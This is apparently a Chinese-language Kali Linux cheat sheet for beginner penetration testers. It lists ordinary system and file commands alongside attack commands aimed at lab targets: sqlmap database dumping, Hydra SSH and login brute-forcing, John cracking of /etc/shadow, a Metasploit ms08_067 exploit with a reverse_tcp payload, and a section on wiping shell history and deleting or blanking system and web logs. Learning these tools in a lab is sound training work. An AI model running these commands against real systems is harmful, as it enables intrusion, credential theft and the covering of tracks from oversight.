🔥 覆盖渗透全场景高频命令,按功能分类排版+实战示例,新手不用死记硬背,遇到需求直接翻,效率翻倍!
最新Kali Linux系统: http:// https://pan.quark.cn/s/ff58f9f0e064
一、基础系统命令(入门必背,适配所有操作场景)
1. 系统信息查询(快速掌握设备/系统状态)
- uname -a :查看系统内核版本、架构(提权/工具适配必用)
- cat /etc/issue :查看Kali系统版本(如2024.3)
- hostname :查看主机名(实战中修改隐藏身份: hostname 新名称 )
- whoami :查看当前登录用户(确认权限,提权后验证是否为root)
- id :查看用户UID/GID及所属组(权限管理核心)
- free -h :查看内存使用情况(优化系统/避免工具卡顿)
- df -h :查看磁盘空间(确保有足够存储安装工具/存放漏洞脚本)
- top :实时监控系统进程/CPU/内存占用(排查异常进程)
2. 用户与权限管理(避免操作被拒,实战核心)
- sudo su :切换为root用户(获取最高权限,实操前必做)
- useradd 用户名 :创建新用户(测试多权限场景)
- passwd 用户名 :修改用户密码(如 passwd kali )
- chmod 权限 文件名 :修改文件权限(高频: chmod 777 文件名 全权限; chmod +x 脚本.sh 赋予执行权限)
- chown 用户名:用户组 文件名 :更改文件所有者(如 chown root:root 脚本.sh )
- chgrp 用户组 文件名 :更改文件所属组
- su 用户名 :切换到指定用户(测试低权限渗透场景)
- sudo 命令 :临时用root权限执行指令(如 sudo apt update )
3. 系统服务管理(工具运行/靶场部署必备)
- service 服务名 start/stop/restart :启动/停止/重启服务(高频:
service apache2 restart 重启Web服务; service mysql start 启动数据库)
- systemctl start/stop/restart 服务名 :CentOS/Kali通用服务指令(替代service)
- service --status-all :查看所有服务运行状态
- netstat -tuln :查看监听端口(确认服务是否启动,如80/3306端口)
- ps -aux :查看所有运行进程(查找工具/木马进程: ps -aux | grep 进程名 )
- kill -9 进程ID :强制结束进程(如 kill -9 1234 ,进程ID通过ps查询)
4. 系统更新与工具安装(保持工具最新,修复漏洞)
- apt update :更新软件源索引(安装工具前必做)
- apt upgrade -y :升级所有已安装软件(避免旧版本工具报错)
- apt install 工具名 -y :安装工具(高频: apt install nmap burpsuite -y 批量安装)
- apt remove 工具名 -y :卸载工具
- apt autoremove -y :清理无用依赖(释放磁盘空间)
- wget 工具下载链接 :通过链接下载工具/脚本(如 wget 漏洞脚本URL )
- dpkg -i 安装包.deb :安装本地deb格式工具(适配无法通过apt安装的软件)
二、文件/目录操作命令(管理工具/脚本/漏洞文件)
1. 目录切换与查看(快速定位文件位置)
- cd 目录路径 :切换目录(高频:
cd /root 进入root目录; cd .. 返回上一级; cd ~ 回到当前用户主目录; cd / 进入根目录)
- ls :查看当前目录文件( ls -l 详细列表; ls -a 显示隐藏文件; ls -lh 人性化显示大小)
- pwd :查看当前所在目录路径(避免迷路,实战中记录关键路径)
- tree 目录名 :以树形结构查看目录下文件(快速梳理工具目录)
2. 文件/目录创建与删除(管理实战资源)
- mkdir 目录名 :创建目录(如 mkdir kali-tools 存放工具)
- mkdir -p 多级目录 :创建嵌套目录(如 mkdir -p /root/test/123 )
- touch 文件名 :创建空文件(如 touch test.txt 记录指令)
- rm 文件名 :删除文件( rm -f 文件名 强制删除; rm -rf 目录名 强制删除目录及所有内容,谨慎使用!)
- cp 源文件 目标路径 :复制文件(如 cp 脚本.sh /root/test/ )
- cp -r 源目录 目标路径 :复制目录(含子文件)
- mv 源文件/目录 目标路径 :移动/重命名(如 mv old.txt new.txt 重命名; mv 脚本.sh /root/ 移动)
3. 文件内容查看与编辑(修改脚本/查看配置)
- cat 文件名 :查看文件全部内容(短文件首选,如 cat config.php 看数据库配置)
- more/less 文件名 :分页查看长文件(less支持上下滑动,按q退出)
- head -n 10 文件名 :查看文件前10行(如 head -n 5 日志.log 看关键日志)
- tail -n 10 文件名 :查看文件后10行( tail -f 日志.log 实时监控日志更新)
- grep "关键词" 文件名 :搜索文件中关键词(高频: grep "password" 配置文件 找密码; grep -n 关键词 显示行号)
- vi/vim 文件名 :编辑文件(新手简化操作:
1. vim 文件名 进入编辑;2. 按i进入输入模式;3. 编辑完成按Esc,输入 :wq 保存退出; :q! 强制退出不保存)
- echo "内容" > 文件名 :覆盖文件内容(如 echo "test" > 1.txt )
- echo "内容" >> 文件名 :追加内容到文件末尾(不覆盖原有内容)
4. 文件压缩与解压(传输/存储工具/脚本)
- tar -zcvf 压缩包.tar.gz 源文件/目录 :压缩文件(如 tar -zcvf tools.tar.gz /root/kali-tools/ )
- tar -zxvf 压缩包.tar.gz :解压tar.gz格式( tar -zxvf 压缩包.tar.gz -C 目标目录 指定解压路径)
- unzip 压缩包.zip :解压zip格式( unzip 压缩包.zip -d 目标目录 )
- zip 压缩包.zip 源文件/目录 :压缩为zip格式
- unrar x 压缩包.rar :解压rar格式(需先安装: apt install unrar -y )
三、网络操作命令(渗透前信息收集/网络调试)
1. IP/网络配置(确保联网/靶场通信)
- ifconfig :查看网卡IP、MAC地址(确认Kali IP,如 192.168.1.105 ,靶场需同网段)
- ip addr :替代ifconfig,查看IP配置(新版本Kali推荐)
- ping 目标IP/域名 :测试网络连通性(如 ping 192.168.1.100 测试靶场是否可达,按Ctrl+C停止)
- ping -c 4 目标IP :发送4个ping包后停止(避免持续发送)
- route -n :查看路由表(排查网络不通问题)
- netstat -anpt :查看所有端口连接状态(含进程ID,如 netstat -anpt | grep 80 查看80端口占用)
- traceroute 目标IP :追踪网络路由(排查网络延迟/中断节点)
- hostnamectl set-hostname 新名称 :永久修改主机名(重启生效)
2. 端口/服务扫描(渗透前信息收集核心)
- nmap 目标IP :基础端口扫描(默认扫描1000个常用端口)
- nmap -sV 目标IP :扫描端口+识别服务版本(如 nmap -sV 192.168.1.100 ,渗透必用)
- nmap -p 1-65535 目标IP :全端口扫描( nmap -p 80,443,3306 目标IP 指定端口扫描)
- nmap -O 目标IP :操作系统版本识别
- nmap -A 目标IP :全面扫描(端口+服务+系统+脚本,新手首选)
- ss -tuln :快速查看监听端口(比netstat更高效)
- nc -zv 目标IP 端口范围 :快速检测端口是否开放(如 nc -zv 192.168.1.100 80-100 )
3. 远程连接/文件传输(操控靶场/传输工具)
- ssh 用户名@目标IP :远程连接Linux靶场(如 ssh root@192.168.1.100 ,输入密码登录)
- scp 源文件 用户名@目标IP:目标路径 :远程传输文件(如 scp 脚本.sh root@192.168.1.100:/root/ )
- scp 用户名@目标IP:源文件 本地路径 :从远程下载文件到本地
- ftp 目标IP :FTP连接(输入用户名密码, put 本地文件 上传, get 远程文件 下载)
- curl 目标URL :访问网页/测试接口(如 curl http://192.168.1.100 查看靶场首页)
- wget 目标URL :下载网络文件(如 wget http://靶场IP/1.php 下载木马文件)
四、渗透测试专项命令(实战高频,直接落地)
1. Web渗透核心命令(适配DVWA/企业Web靶场)
- dirsearch -u 目标URL -e php,html,txt :Web目录扫描(挖掘隐藏后台/备份文件)
- whatweb 目标URL :网站指纹识别(获取服务器/开发语言/数据库类型)
- sqlmap -u "目标URL?参数=值" --dbs :SQL注入检测+导出数据库(如 sqlmap -u "http://192.168.1.100/dvwa/?id=1" --dbs )
- sqlmap -u 目标URL -D 数据库名 -T 表名 --dump :导出数据库表数据(如 -D dvwa -T users --dump 获取账号密码)
- burpsuite :启动Web渗透抓包工具(图形化,直接终端输入命令启动)
- gobuster dir -u 目标URL -w 字典路径 :目录扫描(替代dirsearch,如 gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt )
2. 密码破解命令(Hydra/John核心用法)
- hydra -l 用户名 -P 字典路径 目标IP 协议 :暴力破解(高频场景:
SSH破解: hydra -l root -P pass.txt 192.168.1.100 ssh
HTTP登录破解: hydra -l admin -P pass.txt http-post-form "/login.php:username=^USER^&password=^PASS^:登录失败提示" )
- john 密码文件 :破解密码哈希(如 john /etc/shadow ,需先获取哈希文件)
- john --show 密码文件 :显示已破解的密码
- unshadow /etc/passwd /etc/shadow > pass.hash :合并passwd和shadow文件,生成John可破解的哈希文件
3. 漏洞利用/提权命令(Metasploit/系统提权)
- msfconsole :启动Metasploit渗透框架(实战核心,输入后进入交互界面)
- search 漏洞名/CVE编号 :MSF中搜索漏洞模块(如 search ms08-067 )
- use 模块路径 :加载漏洞模块(如 use exploit/windows/smb/ms08_067_netapi )
- set RHOSTS 目标IP :设置靶场IP(MSF中必配参数)
- set PAYLOAD payload路径 :设置攻击载荷(如 set PAYLOAD windows/meterpreter/reverse_tcp )
- exploit :执行漏洞利用(成功后获取靶场会话)
- meterpreter > shell :MSF会话中获取靶场命令行
- find / -perm -4000 2>/dev/null :查找SUID权限文件(Linux提权常用,找可利用的高权限文件)
- cat /etc/crontab :查看定时任务(挖掘定时任务提权漏洞)
4. 日志清理命令(合规实操,避免痕迹)
- history -c :清空当前用户的命令历史记录(避免操作被追踪)
- history -w :保存命令历史(清空后执行,彻底覆盖原有记录)
- rm -rf /var/log/auth.log /var/log/wtmp :删除系统登录日志(Linux靶场提权后清理)
- rm -rf /var/log/apache2/access.log /var/log/apache2/error.log :删除Web访问/错误日志
- echo "" > 日志文件名 :清空日志文件(替代删除,更隐蔽,如 echo "" > /var/log/auth.log )
五、高效使用技巧(新手少走弯路,提升实操效率)
1. 命令补全:输入命令/文件前3个字符,按Tab键自动补全(避免输错,提升速度);补全有歧义时按2次Tab,显示所有可选内容。
2. 命令历史:按↑↓键切换历史命令,不用重复输入; history 查看所有历史命令, !命令编号 快速执行历史命令(如 !123 执行第123条命令)。
3. 别名设置:常用复杂命令设别名(如 alias sql="sqlmap" ,后续直接输入sql启动工具),设置后执行 source ~/.bashrc 生效,重启后保留。
4. 管道符 | :串联多个命令,前一个命令结果作为后一个输入(高频: ps -aux | grep msf 查找MSF进程; nmap -sV 192.168.1.0/24 | grep open 筛选开放端口)。
5. 通配符: * 匹配任意字符(如 rm *.txt 删除所有txt文件), ? 匹配单个字符, [] 匹配指定字符(如 ls test[1-3].sh 查看test1-3.sh文件)。
6. 后台运行:命令后加 & ,让工具后台运行(如 dirsearch -u 目标URL & ),避免终端被占用; jobs 查看后台任务, fg 任务编号 调回前台。
7. 关键命令收藏:将本文保存到Kali桌面( wget 文章链接 -O kali命令手册.txt ),或截图保存,实操时直接对照,不用反复翻找。
六、新手避坑指南(4个高频错误,直接规避)
1. 权限不足报错“Permission denied”:先执行 sudo su 切换root用户,或在命令前加 sudo (如 sudo rm 文件名 )。
2. 命令不存在报错“command not found”:先通过 apt install 工具名 安装对应工具(如 apt install dirsearch -y ),再执行命令。
3. 目录/文件找不到报错“No such file or directory”:用 pwd 确认当前路径, ls 查看是否有目标文件,或输入完整路径(如 /root/脚本.sh )。
4. 网络扫描无结果:先 ping 目标IP 测试连通性,确认Kali与靶场同网段,关闭靶场防火墙,检查命令参数是否正确(如IP是否输错)。